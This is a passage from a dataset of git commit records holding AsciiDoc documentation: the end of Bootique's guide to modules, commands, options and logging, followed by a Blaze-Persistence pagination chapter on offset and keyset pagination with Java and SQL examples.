}\n}\n----\n\nAfter that we need to create a service provider file called `META-INF\/service\/io.bootique.config.PolymorphicConfiguration` where all the types participating in the hierarchy are listed (including the supertype):\n\n[source,text]\n----\ncom.foo.BaseTypeFactory\ncom.foo.ConcreteTypeFactory1\ncom.foo.ConcreteTypeFactory2\n----\n\nThis should be enough to work with configuration like this:\n\n[source,yaml]\n----\nmy:\n type: type2\n someVar: someVal\n----\n\nThe service of `BaseType` is bound in Guice using the standard `ConfigurationFactory` approach described above. Depending on the YAML config,\none of the subclasses of `BaseType` will be created:\n\n[source,java]\n----\n@Provides\npublic BaseType provideBaseType(ConfigurationFactory configFactory) {\n\n return configFactory\n .config(BaseTypeFactory.class, \"my\")\n .create();\n}\n----\n\nIf another module decides to create yet another subclass of BaseType, it will need to create its own `META-INF\/service\/io.bootique.config.PolymorphicConfiguration` file and add a new factory name there.\n\n=== Using Modules\n\nModules can use other \"upstream\" modules in a few ways:\n\n* \"Import\": a downstream module uses another module as a library, ignoring its injectable services.\n* \"Use\" : downstream module's classes inject classes from an upstream module.\n* \"Contribute\": downstream module injects objects to collections and maps defined in upstream modules.\n\nImport case is trivial, so we'll concentrate on the two remaining scenarios. We will use https:\/\/github.com\/bootique\/bootique\/blob\/master\/bootique\/src\/main\/java\/io\/bootique\/BQCoreModule.java[BQCoreModule] as an example of an upstream module, as it is available in all apps.\n\n==== Injecting Other Module's Services\n\nYou can inject any services declared in other modules. E.g. BQCoreModule provides a number of objects and services that can be accessed via injection:\n\n[source,java]\n----\nclass MyService {\n\n @Args\n @Inject\n private String[] args;\n\n public String getArgsString() {\n return Arrays.asList(getArgs()).stream().collect(joining(\" \"));\n }\n}\n----\n\nIn this example we injected command line arguments that were used to start the app. Note that since there can potentially be more than one `String[]` in a DI container, Bootique `@Args` annotation is used to uniquely identify the array that we want here.\n\n==== Contributing to Other Modules\n\nGuice supports https:\/\/github.com\/google\/guice\/wiki\/Multibindings[multibindings], intended to _contribute_ objects defined in a downstream module to collections\/maps used by services in upstream modules. Bootique hides Guice API complexities, usually providing \"extenders\" in each module. E.g. the following code adds `MyCommand` the the app set of commands:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nHere we obtained an extender instance via a static method on BQCoreModule. Most standard modules define their own extenders accessible via `"extend(Binder)"`. This is a pattern you might want to follow in your own modules.\n\n=== Application Class\n\nA class that contains the `"main()"` method is informally called \"application\". Bootique does not impose any additional requirements on this class. You decide what to put in it. It can be limited to just `"main()"`, or turned into a REST API resource, etc.\n\n==== Application as a Module\n\nMost often then not it makes sense to turn the application class into a Module though. After all a Bootique app is just a collection of Modules, and this way the application class would represent that one final Module to rule them all:\n\n[source,java]\n----\npublic class Application implements Module {\n\n public static void main(String[] args) {\n Bootique.app(args).module(Application.class).autoLoadModules().exec().exit();\n }\n\n public void configure(Binder binder) {\n \/\/ load app-specific services; redefine standard ones\n }\n}\n----\n\nYou may also implement a separate BQModuleProvider for the Application module. Then `autoLoadModules()` will discover it just like any other Module, and there won't be a need to add Application module explicitly.\n\n==== Common Main Class\n\nIf all your code is packaged in auto-loadable modules (which is always a good idea), you may not even need a custom main class. `io.bootique.Bootique` class itself declares a `main()` method and can be used as an app launcher. This creates some interesting possibilities. E.g. you can create Java projects that have no code of their own and are simply collections of modules declared as compile dependencies. More details on packaging are given in the \"Runnable Jar\" chapter.\n\n=== Commands\n\nBootique runtime contains a set of commands coming from Bootique core and from all the modules currently in effect in the app. On startup Bootique attempts to map command-line arguments to a single command type. If no match is found, a _default_ command is executed (which is normally a \"help\" command). To list all available commands, the app can be run with `--help` option (in most cases running without any options will have the same effect). E.g.:\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n\nNAME\n com.foo.MyApp\n\nOPTIONS\n -c yaml_location, --config=yaml_location\n Specifies YAML config location, which can be a file path or a URL.\n\n -h, --help\n Prints this message.\n\n -H, --help-config\n Prints information about application modules and their configuration\n options.\n\n -s, --server\n Starts Jetty server.\n\n----\n\n==== Writing Commands\n\nMost common commands are already available in various standard modules, still often you'd need to write your own. To do that, first create a command class. It should implement `io.bootique.command.Command` interface, though usually it more practical to extend `io.bootique.command.CommandWithMetadata` and provide some metadata used in help and elsewhere:\n\n[source,java]\n----\npublic class MyCommand extends CommandWithMetadata {\n\n private static CommandMetadata createMetadata() {\n return CommandMetadata.builder(MyCommand.class)\n .description(\"My command does something important.\")\n .build();\n }\n\n public MyCommand() {\n super(createMetadata());\n }\n\n @Override\n public CommandOutcome run(Cli cli) {\n\n \/\/ ... run the command here....\n\n return CommandOutcome.succeeded();\n }\n}\n----\n\nThe command initializes metadata in constructor and implements the \"run\" method to run its code. The return CommandOutcome object instructs Bootique what to do when the command finishes. The object contains desired system exit code, and exceptions that occurred during execution. To make the new command available to Bootique, add it to `BQCoreModule`'s extender, as was already shown above:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nTo implement a \"daemon\" command running forever until it receives an OS signal (e.g. a web server waiting for user requests) , do something like this:\n\n[source,java]\n----\n@Override\npublic CommandOutcome run(Cli cli) {\n\n \/\/ ... start some process in a different thread ....\n\n \/\/ now wait till the app is stopped from another thread\n \/\/ or the JVM is terminated\n try {\n Thread.currentThread().join();\n } catch (InterruptedException e) {\n \/\/ ignore exception or log if needed\n }\n\n return CommandOutcome.succeeded();\n}\n----\n\n==== Injection in Commands\n\nCommands can inject services, just like most other classes in Bootique. There are some specifics though. Since commands are sometimes instantiated, but not executed (e.g. when `--help` is run that lists all commands), it is often desirable to avoid immediate instantiation of all dependencies of a given command. So a common pattern with commands is to inject Guice `Provider` instead of direct dependency:\n\n[source,java]\n----\n@Inject\nprivate Provider<SomeService> provider;\n\n@Override\npublic CommandOutcome run(Cli cli) {\n provider.get().someMethod();\n}\n----\n\n==== Decorating Commands\n\nEach command typically does a single well-defined thing, such as starting a web server, executing a job, etc. But very often in addition to that main thing you need to do other things. E.g. when a web server is started, you might also want to run a few more commands:\n\n* Before starting the server, run a health check to verify that any external services the app might depend upon are alive.\n* Start a job scheduler in the background.\n* Start a monitoring \"heartbeat\" thread.\n\nTo run all these \"secondary\" commands when the main command is invoked, Bootique provides command decorator API. First you create a decorator policy object that specifies one or more secondary commands and their invocation strategy (either _before_ the main command, or _in parallel_ with it). Second you \"decorate\" the main command with that policy:\n\n[source,java]\n----\nCommandDecorator extraCommands = CommandDecorator\n .beforeRun(CustomHealthcheckCommand.class)\n .alsoRun(ScheduleCommand.class)\n .alsoRun(HeartbeatCommand.class);\n\nBQCoreModule.extend(binder).decorateCommand(ServerCommand.class, extraCommands);\n----\n\nBased on the specified policy Bootique figures out the sequence of execution and runs the main and the secondary commands.\n\n=== Options\n\n==== Simple Options\n\nIn addition to commands, the app can define \"options\". Options are not associated with any runnable java code, and simply pass command-line values to commands and services. E.g. the standard \"`--config`\" option is used by `CliConfigurationSource` service to locate configuration file. Unrecognized options cause application startup errors. To be recognized, options need to be \"contributed\" to Bootique similar to commands:\n\n[source,java]\n----\nOptionMetadata option = OptionMetadata\n .builder(\"email\", \"An admin email address\")\n .valueRequired(\"email_address\")\n .build();\n\nBQCoreModule.extend(binder).addOption(option);\n----\n\nTo read a value of the option, a service should inject `io.bootique.cli.Cli` object (commands also get this object as a parameter to \"run\") :\n\n[source,java]\n----\n@Inject\nprivate Cli cli;\n\npublic void doSomething() {\n Collection<String> emails = cli.optionStrings(\"email\");\n \/\/ do something with option values....\n}\n----\n\n==== Configuration Options\n\nWhile you can process your own options as described above, options often are just aliases to enable certain pieces of configuration. Bootique supports three flavors of associating options with configuration. Let's demonstrate them here.\n\n. Option value sets a config property:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt=x\" will set \"jobs.myjob.param\" value to \"x\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence sets a property to a predefined value:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" will set \"jobs.myjob.param\" value to \"y\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").valueOptionalWithDefault(\"y\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence loads a config resource, such as a YAML file:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" is equivalent to starting with \"--config=classpath:xyz.yml\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigResource(\"my-opt\", \"classpath:xyz.yml\");\n----\n\nThe order of config-bound options on the command line is significant, just as the order of \"`--config`\" parameters. Bootique merges configuration associated with options from left to right, overriding any preceding configuration if there is an overlap.\n\n=== Logging\n\n==== Loggers in the Code\n\nStandard Bootique modules use http:\/\/www.slf4j.org\/[SLF4J] internally, as it is the most convenient least common denominator framework, and can be easily bridged to other logging implementations. Your apps or modules are not required to use SLF4J, though if they do, it will likely reduce the amount of bridging needed to route all logs to a single destination.\n\n==== Configurable Logging with Logback\n\nFor better control over logging a standard module called `bootique-logback` is available, that integrates http:\/\/logback.qos.ch\/[Logback framework] in the app. It seamlessly bridges SLF4J (so you keep using SLF4J in the code), and allows to configure logging via YAML config file, including appenders (file, console, etc.) and per class\/package log levels. Just like any other module, `bootique-logback` can be enabled by simply adding it to the pom.xml dependencies, assuming `autoLoadModules()` is in effect:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.bootique.logback<\/groupId>\n <artifactId>bootique-logback<\/artifactId>\n<\/dependency>\n----\n\nSee `bootique-logback` module http:\/\/bootique.io\/docs\/0\/bootique-logback-docs\/[documentation] for further details.\n\n==== BootLogger\n\nTo perform logging during startup, before DI environment is available and YAML configuration is processed, Bootique uses a special service called `BootLogger`, that is not dependent on SLF4J and is not automatically bridged to Logback. It provides an abstraction for writing to stdout \/ stderr, as well as conditional \"trace\" logs sent to stderr. To enable Bootique trace logs, start the app with `-Dbq.trace` as described in the deployment section.\n\nBootLogger is injectable, in case your own code needs to use it. If the default BootLogger behavior is not satisfactory, it can be overridden right in the `main(..)` method, as unlike other services, you may need to change it before DI is available:\n\n[source,java]\n----\npublic class Application {\n public static void main(String[] args) {\n Bootique.app(args).bootLogger(new MyBootLogger()).run();\n }\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0303ae8b605c89ec853d2e016b0c2bc3373aa9f3","subject":"Fixed #118","message":"Fixed #118\n","repos":"Blazebit\/blaze-persistence,Blazebit\/blaze-persistence,Blazebit\/blaze-persistence,Blazebit\/blaze-persistence","old_file":"documentation\/src\/main\/asciidoc\/core\/manual\/en_US\/13_pagination.adoc","new_file":"documentation\/src\/main\/asciidoc\/core\/manual\/en_US\/13_pagination.adoc","new_contents":"== Pagination\n\nPagination is often used to make large data sets consumable. It requires an ordered set of elements\/rows to be able to deterministically split the data into pages.\nImagine the following ordered data set\n\n[ditaa, nolightbox=\"true\"]\n....\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w | x | y | z |\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n....\n\nIf we split it up into pages of the size of 5 elements we get 6 pages and the last one only containing 1 element\n\n[ditaa, nolightbox=\"true\"]\n....\n +---+ +---+ +---+ +---+ +---+ +---+\n | a | | f | | k | | p | | u | | z |\n +---+ +---+ +---+ +---+ +---+ +---+\n | b | | g | | l | | q | | v |\n +---+ +---+ +---+ +---+ +---+\n | c | | h | | m | | r | | w |\n +---+ +---+ +---+ +---+ +---+\n | d | | i | | n | | s | | x |\n +---+ +---+ +---+ +---+ +---+\n | e | | j | | o | | t | | y |\n +---+ +---+ +---+ +---+ +---+\n\nPage 1 2 3 4 5 6\n....\n\n{projectname} provides two ways to do pagination.\n\n* Conventional pagination via link:{core_doc}\/persistence\/LimitBuilder.html#setFirstResult(int)[`setFirstResult()`] and link:{core_doc}\/persistence\/LimitBuilder.html#setMaxResults(int)[`setMaxResults()`]\n* Extended pagination support via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API\n\nConventional pagination in JPA only works on the main query which is also possible with {projectname}.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\nIn addition to that, offset pagination for subqueries is also possible.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .where(\"id\").in()\n .from(Cat.class, \"subCat\")\n .select(\"subCat.id\")\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .end()\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN LIMIT((\n SELECT subCat.id\n FROM Cat cat\n ORDER BY cat.id ASC NULLS LAST\n),1 ,1) --LIMIT 1 OFFSET 1\n----\n\nThe extended pagination support comes via the criteria builder's link:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page()`] methods which come in three flavours:\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page(int firstResult, int maxResults)`]::\n\n Performs <<anchor-offset-pagination,offset pagination>> by skipping `firstResult` elements and from there on, show `maxResults` elements.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(com.blazebit.persistence.KeysetPage,%20int,%20int)[`page(KeysetPage keysetPage, int firstResult, int maxResults)`]::\n\n Performs <<anchor-keyset-pagination,keyset pagination>> if possible and falls back to offset pagination otherwise.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(java.lang.Object,%20int)[`page(Object entityId, int maxResults)`]::\n\n Navigates to the <<anchor-navigate-entity-page,page containing the entity>> with the given `entityId`. Falls back to the first page if no entity for the id exists.\n\n=== Under the hood\n\nIn {projectname} we have followed a more involved approach for implementing pagination than plainly using JPA standard\nmethods like `javax.persistence.Query.setMaxResults()` or `javax.persistence.Query.setFirstResult()` to steer the result set\ndimensions. This is due to deficiencies in some JPA providers when it comes to handling paginated queries containing\njoin fetches for collections.\n\nNOTE: By default, when using fetch joins for collections with Hibernate, all results are fetched instead of only the selected page.\n\nThe approach used in {projectname} consists of up to three queries executed consecutively:\n\n. The *count query* is used to fetch the total element count which is needed to populate `com.blazebit.persistence.PagedList.getTotalSize()` and\n`com.blazebit.persistence.PagedList.getTotalPages()`. If this query returns 0, no further queries are executed.\n\n. The *ID query* is used to fetch the entity ids that are contained in the target page. In this step, the previously\n mentioned `javax.persistence.Query.setMaxResults()` and `javax.persistence.Query.setFirstResult()` are used select the\n target ID set. Only selecting the IDs allows to omit all fetch joins, especially collection joins that might trigger inefficient jpa provider\n strategies. The *ID query* is omitted if no collection fetch joins are done, because in that case JPA providers tend to do the right thing when paginating directly.\n\n. Finally, the *object query* is used to fetch the entities as described by the original query specified by the user.\nThis query uses an `IN` predicate for the ID set retrieved in the previous step to restrict the fetched entities to the target\npage.\n\nNOTE: In a future version it might be possible to combine queries or disable the count query. For more information on that see https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/248[#248],\nhttps:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/249[#249] and https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/255[#255]\n\nTIP: You can inspect the query strings by using link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageCountQueryString()[`getPageCountQueryString()`],\nlink:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageIdQueryString()[`getPageIdQueryString()`] and link:{core_doc}\/persistence\/Queryable.html#getQueryString()[`getQueryString()`]\n\n[[anchor-offset-pagination]]\n=== Offset pagination\n\nAs already laid out in the <<pagination,introduction>>, pagination works on an ordered set of elements\/rows.\nOffset pagination basically looks at the ordered set from left to right and counts elements until the count reaches `firstResult`.\nFrom that point on elements are collected until `maxResults` of elements have been collected or no more elements are available.\n\nThis basically means that the `OFFSET` i.e. `firstResult` part forces a DBMS to actually determine an element\/row is visible for a transaction and then _ignore_\/_skip_ it.\nThe bigger the `firstResult` value, the more resources the DBMS has to waste for _skipping_ elements\/rows.\nThis essentially means that when employing offset pagination, accessing the latter pages will become more and more expensive.\nIn order for this approach to be actually usable with larger data sets, a DBMS index that can be used for the ordering is required to avoid constantly loading and sorting data.\nIn addition to that, the DBMS should have enough RAM to keep the index fully in-memory to avoid costly disk fetches.\n\nAlthough offset pagination works in every case, it should be avoided if possible because of the performance implications.\nAs you will see in the <<anchor-keyset-pagination,keyset pagination part>> there is a more efficient approach to pagination that almost uses the same API.\n\nThe following example illustrates the usage and what happens behind the scenes\n\n[source, java]\n----\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(5, 5)\n .getResultList();\n----\n\nExecutes the following queries\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*)\nFROM Cat cat\n----\n\nNote that the *ID query* is necessary because of the join fetched collection `kittens`\n\n[.ID query]\n[source,sql]\n----\nSELECT cat.id\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\n[.Object query]\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN :idParams\nORDER BY cat.id ASC NULLS LAST\n----\n\n[[anchor-keyset-pagination]]\n=== Keyset pagination\n\nKeyset pagination is a way to efficiently paginate or scroll through a large data set by querying for elements that come before or after a reference point.\nThe idea of a keyset is, that every tuple can be uniquely identified by that keyset. So a keyset essentially is a reference point of a tuple in a data set ordered by keysets.\nKeyset pagination in contrast to offset pagination makes efficient use of the ordering property of the data set.\nBy remembering the highest and lowest keysets of a page, it is possible to query the previous and next pages efficiently.\n\nA keyset in terms of query results consists of the values of the `ORDER BY` expressions of a tuple.\nIn order to satisfy the uniqueness constraint, it is generally a good idea to use an entity's id as last expression in the `ORDER BY` clause.\n\nNOTE: Currently the entity id is the *only* possible expression that satisfies the uniqueness constraint.\n\nKeyset pagination just like offset pagination requires index support on the DBMS side to work efficiently. A range-scan enabled index like provided by a b-tree index is required for keyset pagination to work best.\nIn contrast to offset pagination, an index does not have to be traversed like a list in order to _ignore_\/_skip_ a certain amount of elements\/rows. Instead, a DBMS can make use of the structure of the index\nand traverse it in `O(log N)` as compared to `O(N)` to get to the `firstResult`. This characteristic makes keyset pagination especially useful for accessing latter pages.\n\nTIP: Don't allow too many different sort combinations as every combination requires a custom index to work efficiently.\n\nOne of the obvious requirements for keyset pagination to work, is the need for a reference point i.e. a keyset from which point on the next or previous elements should be queried.\n\nThe API in {projectname} tries to allow making use of keyset pagination in a transparent and easy manner without compromises.\n\n[source, java]\n----\n\/\/ In the beginning we don't have a keyset page\nKeysetPage oldPage = null;\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(oldPage, 5, 5) #<1>\n .getResultList();\n\n\/\/ Query the next page with the keyset page of page2\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 10, 5) #<2>\n .getResultList();\n\n\/\/ Query the previous page with the keyset page of page2\nPagedList<Cat> page1 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 0, 5) #<3>\n .getResultList();\n----\n<1> The oldPage in this case is `null`, so internally it falls back to offset pagination\n<2> When querying the _next_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getHighest()[upper bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n<3> When querying the _previous_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getLowest()[lower bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n\nSince we are not fetching any collections, the ID query is avoided. For brevity, we skip the count query.\nSo let's look at the object queries generated\n\n[.Object query 1]\n[source,sql]\n----\nSELECT cat, cat.id #<1>\nFROM Cat cat\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5 OFFSET 5\n----\n<1> The expression `cat.id` is for constructing the keyset and contains all expressions of the `ORDER BY` clause\n\nAs you can see, nothing fancy, except for the additional select that is used for extracting the keyset.\n\n[.Object query 2]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday > :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id > :_keysetParameter_1\n)\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5\n----\n\nThis time the query made efficient use of the keyset by filtering out elements\/rows that come before the reference point\n\n[.Object query 3]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday < :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id < :_keysetParameter_1\n)\nORDER BY cat.birthday DESC NULLS FIRST, cat.id DESC NULLS FIRST\n--LIMIT 5\n----\n\nBefore the query filtered out elements\/rows that came *before* the reference point, this time it does the opposite. It filters out elements\/rows coming *after* the reference point.\nAnother interesting thing to notice, the ordering was reversed too. This has the effect that the DBMS can traverse the index backwards and essentially is how keyset pagination works.\nThe ordering is reversed again in-memory, so you don't notice anything of these details.\n\nNote that in the following situations, the implementation automatically falls back to offset pagination\n\n* The keyset is invalid i.e. it is `null`\n* The ordering of the query changed\n* The page to navigate to is arbitrary i.e. not the next or previous page of a `keysetPage`\n\nTo be able to make use of keyset pagination either via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API or the <<keyset-pagination-support,manual keyset filter API>>,\nthe link:{core_doc}\/persistence\/KeysetPage.html[`KeysetPage`] or the respective link:{core_doc}\/persistence\/Keyset.html[`Keyset`] elements have to be preserved across page requests.\nApplications that can retain state between requests(i.e. via a session) can just preserve the `KeysetPage` object itself. Applications that try to avoid server side state have to serialize and deserialize the state somehow.\n\nSince the keyset state is available through link:{core_doc}\/persistence\/Keyset.html#getTuple()[getter methods], it shouldn't be too hard to do the serialization and deserialization.\nWhen implementing a custom `Keyset`, the `equals()` and `hashCode()` contracts have to make use of just the tuple. A custom `KeysetPage` implementation has to provide access to the lowest and highest keysets,\nas well as the `firstResult` and `maxResults` values used for querying that page.\n\nBeware that keyset pagination isn't perfect. If the ordering is not stable i.e. entries can be _prepended_ relative to the current keyset\/reference point,\nit might happen that the page number calculation becomes wrong over time. Most of the time this is negligible as it kind of gives the illusion that the user works on a snapshot of the data.\n\n[[anchor-navigate-entity-page]]\n=== Navigate to entity page\n\nThe navigation to the page on which an entity with a specific id is involves finding out the position of the entity.\n{projectname} offers a custom function named <<page-position,`PAGE_POSITION`>> which determines the absolute position of an entity in an ordered set.\n\n[source, java]\n----\nCat knownCat = \/\/...\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page((Object) knownCat.getId(), 3) #<1>\n .getResultList();\n----\n<1> If your id type is a primitive `int`, you must cast to `Object` or `Integer` to use the right method\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*), FUNCTION('PAGE_POSITION',(\n SELECT _page_position_cat.id\n FROM Cat _page_position_cat\n GROUP BY _page_position_cat.id, _page_position_cat.birthday\n ORDER BY _page_position_cat.birthday DESC NULLS FIRST, _page_position_cat.id DESC NULLS FIRST\n), :_entityPagePositionParameter)\nFROM Cat cat\n----\n\nThe count query contains the page position determination logic. It essentially passes an ID query as subquery to the `PAGE_POSITION` function.\nThe concrete SQL implementation of that function depends on the DBMS, but they all follow the same main idea.\nWrap the ID query and count the row numbers. In another wrapper around that, filter for the row with the matching id and return the row number as position.\nThe element\/row number of the first element on that page is calculated and used as `firstResult`. Apart from this speciality, the rest of the query is just like a normal offset pagination query.\n\n=== Limitations\n\nSince the `PaginatedCriteriaBuilder` API can only paginate on entity level, the results are implicitly grouped by id and therefore distinct.\nBecause of that, the usage of `distinct()` or `groupBy()` on a `PaginatedCriteriaBuilder` is disallowed and will result in an exception.\n\nIf these limitations are not ok for your use case, you will have to implement a custom pagination strategy via `setFirstResult()` and `setMaxResults()`.","old_contents":"== Pagination\n\nPagination is often used to make large data sets consumable. It requires an ordered set of elements\/rows to be able to deterministically split the data into pages.\nImagine the following ordered data set\n\n[ditaa, nolightbox=\"true\"]\n....\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w | x | y | z |\n+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n....\n\nIf we split it up into pages of the size of 5 elements we get 6 pages and the last one only containing 1 element\n\n[ditaa, nolightbox=\"true\"]\n....\n +---+ +---+ +---+ +---+ +---+ +---+\n | a | | f | | k | | p | | u | | z |\n +---+ +---+ +---+ +---+ +---+ +---+\n | b | | g | | l | | q | | v |\n +---+ +---+ +---+ +---+ +---+\n | c | | h | | m | | r | | w |\n +---+ +---+ +---+ +---+ +---+\n | d | | i | | n | | s | | x |\n +---+ +---+ +---+ +---+ +---+\n | e | | j | | o | | t | | y |\n +---+ +---+ +---+ +---+ +---+\n\nPage 1 2 3 4 5 6\n....\n\n{projectname} provides two ways to do pagination.\n\n* Conventional pagination via link:{core_doc}\/persistence\/LimitBuilder.html#setFirstResult(int)[`setFirstResult()`] and link:{core_doc}\/persistence\/LimitBuilder.html#setMaxResults(int)[`setMaxResults()`]\n* Extended pagination support via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API\n\nConventional pagination in JPA only works on the main query which is also possible with {projectname}.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\nIn addition to that, offset pagination for subqueries is also possible.\n\n[source, java]\n----\nList<Cat> secondCat = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .where(\"id\").in()\n .from(Cat.class, \"subCat\")\n .select(\"subCat.id\")\n .orderByAsc(\"id\")\n .setFirstResult(1)\n .setMaxResults(1)\n .end()\n .getResultList();\n----\n\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN LIMIT((\n SELECT subCat.id\n FROM Cat cat\n ORDER BY cat.id ASC NULLS LAST\n),1 ,1) --LIMIT 1 OFFSET 1\n----\n\nThe extended pagination support comes via the criteria builder's link:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page()`] methods which come in three flavours:\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(int,%20int)[`page(int firstResult, int maxResults)`]::\n\n Performs <<anchor-offset-pagination,offset pagination>> by skipping `firstResult` elements and from there on, show `maxResults` elements.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(com.blazebit.persistence.KeysetPage,%20int,%20int)[`page(KeysetPage keysetPage, int firstResult, int maxResults)`]::\n\n Performs <<anchor-keyset-pagination,keyset pagination>> if possible and falls back to offset pagination otherwise.\n\nlink:{core_doc}\/persistence\/FullQueryBuilder.html#page(java.lang.Object,%20int)[`page(Object entityId, int maxResults)`]::\n\n Navigates to the <<anchor-navigate-entity-page,page containing the entity>> with the given `entityId`. Falls back to the first page if no entity for the id exists.\n\n=== Under the hood\n\nIn {projectname} we have followed a more involved approach for implementing pagination than plainly using JPA standard\nmethods like `javax.persistence.Query.setMaxResults()` or `javax.persistence.Query.setFirstResult()` to steer the result set\ndimensions. This is due to deficiencies in some JPA providers when it comes to handling paginated queries containing\njoin fetches for collections.\n\nNOTE: By default, when using fetch joins for collections with Hibernate, all results are fetched instead of only the selected page.\n\nThe approach used in {projectname} consists of up to three queries executed consecutively:\n\n. The *count query* is used to fetch the total element count which is needed to populate `com.blazebit.persistence.PagedList.getTotalSize()` and\n`com.blazebit.persistence.PagedList.getTotalPages()`. If this query returns 0, no further queries are executed.\n\n. The *ID query* is used to fetch the entity ids that are contained in the target page. In this step, the previously\n mentioned `javax.persistence.Query.setMaxResults()` and `javax.persistence.Query.setFirstResult()` are used select the\n target ID set. Only selecting the IDs allows to omit all fetch joins, especially collection joins that might trigger inefficient jpa provider\n strategies. The *ID query* is omitted if no collection fetch joins are done, because in that case JPA providers tend to do the right thing when paginating directly.\n\n. Finally, the *object query* is used to fetch the entities as described by the original query specified by the user.\nThis query uses an `IN` predicate for the ID set retrieved in the previous step to restrict the fetched entities to the target\npage.\n\nNOTE: In a future version it might be possible to combine queries or disable the count query. For more information on that see 